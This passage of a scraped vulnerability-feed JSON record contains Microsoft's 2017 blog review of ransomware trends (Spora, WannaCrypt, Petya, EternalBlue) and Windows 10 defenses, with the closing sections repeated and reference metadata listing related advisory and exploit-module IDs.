sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kFCG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-08T08:23:33", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SMNTC-96705", "SMNTC-96704"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["CVE-2017-0144", "CVE-2017-0145"], "type": "cve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-09-08T08:23:33", "rev": 2, "value": 7.7, "vector": "NONE"}}, "hash": "ec9864a9b2ef309100460e3e38b6c3708b1a375009fa5ff29398055f8354820c", "hashmap": [{"hash": "9eea897e5b35094c8bed9578fb2d92a2", "key": "description"}, {"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7c7b135cc6d4ac94a96416aa570dd63d", "key": "href"}, {"hash": "be27874259dfa96aff4b2c923f582319", "key": "published"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "2ed33d64012a372c3bd45d454ea4fb3b", "key": "cvelist"}, {"hash": "be27874259dfa96aff4b2c923f582319", "key": "modified"}, {"hash": "3791d2f219ef1795e98280aa7ad719e4", "key": "title"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "immutableFields": [], "lastseen": "2017-09-08T08:23:33", "modified": "2017-09-06T14:58:36", "objectVersion": "1.5", "published": "2017-09-06T14:58:36", "references": [], "reporter": "msft-mmpc", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "viewCount": 617}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-08T08:23:33"}], "modified": "2017-09-06T14:58:36", "lastseen": "2017-09-08T08:23:33", "published": "2017-09-06T14:58:36", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. [Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kFCG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. [Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 626, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": 